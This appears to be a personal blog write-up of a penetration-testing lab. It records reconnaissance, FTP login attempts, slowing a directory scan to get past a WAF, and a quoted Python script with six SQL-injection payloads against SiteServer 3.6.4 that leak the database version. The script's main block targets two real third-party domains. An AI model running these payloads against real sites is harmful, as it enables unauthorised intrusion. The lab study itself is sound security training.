项目7

信息收集

  1. ip 查询

    image-20240628000654301

  2. 端口查询

    image-20240628001041355

web 渗透

可以尝试使用ip 反查查域名,可以得到域名是 www.moonlab.com

修改host 文件

image-20240721095726441image-20240721095805895

21 端口

image-20240628001144293

尝试一下弱口令

尝试一下anonymous 登录

image-20240628001601684

80

访问80

image-20240628001953849

  1. 尝试爆破目录

    没有啥价值

  2. 发现可能存在webdav 提权漏洞

  3. 发现存在waf

    image-20240721094804641

    可能存在安全狗,然后因为扫描目录的速率过大,导致被封锁了

  4. 可以降低线程数量

    添加sleep 时间

  5. 通过目录扫描获取了siteserver

    image-20240724111038117

    尝试弱密码 -> 失败

    获取nday

    在github 上发现一个检测脚本

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    #!/usr/bin/evn python
    #-*-:coding:utf-8 -*-
    #Author:404
    #Name:siteserver最新版3.6.4 sql inject漏洞大礼包of 1
    #Refer:http://www.wooyun.org/corps/%E7%99%BE%E5%AE%B9%E5%8D%83%E5%9F%9F%E8%BD%AF%E4%BB%B6%E6%8A%80%E6%9C%AF%E5%BC%80%E5%8F%91%E6%9C%89%E9%99%90%E8%B4%A3%E4%BB%BB%E5%85%AC%E5%8F%B8/page/2


    def assign(service,arg):
        if service=="siteserver":
            return True,arg 


    def  audit(arg):
        ps=[
            'siteserver/service/background_taskLog.aspx?Keyword=test%%27%20and%20convert(int,(char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version))=1%20and%202=%271&DateFrom=&DateTo=&IsSuccess=All',
            'usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=2;%20--',
            'siteserver/bbs/background_keywordsFilting.aspx?grade=0&categoryid=0&keyword=test%27%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=1%20and%202=%271',
            'siteserver/userRole/background_administrator.aspx?RoleName=%27%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=1%20and%201=%271&PageNum=0&Keyword=test&AreaID=0&LastActivityDate=0&Order=UserName',
            'siteserver/userRole/background_user.aspx?PageNum=0&Keyword=%27%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=1%20and%201=%27&CreateDate=0&LastActivityDate=0&TypeID=0&DepartmentID=0&AreaID=0',
            'siteserver/bbs/background_thread.aspx?UserName=test&Title=%27%20and%201=char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version%20and%201=%27&DateFrom=&DateTo=&ForumID=0',
            ]
        for p in ps:
            url=arg+p
            code,head,res,errcode,_=curl.curl2(url)
            
            if code==500 and "GAOJIMicrosoft" in res:
                security_hole(url)
            
            
    if __name__=="__main__":
        from dummy import *
        audit(assign('siteserver','http://www.plhgyy.com/')[1])
        #audit(assign('siteserver','http://www.zgktws.com/')[1])

    尝试使用go 进行重构

#靶场记录
项目7
https://tsy244.github.io/2024/06/27/靶场记录/项目7/
Author
August Rosenberg
Posted on
June 27, 2024
Licensed under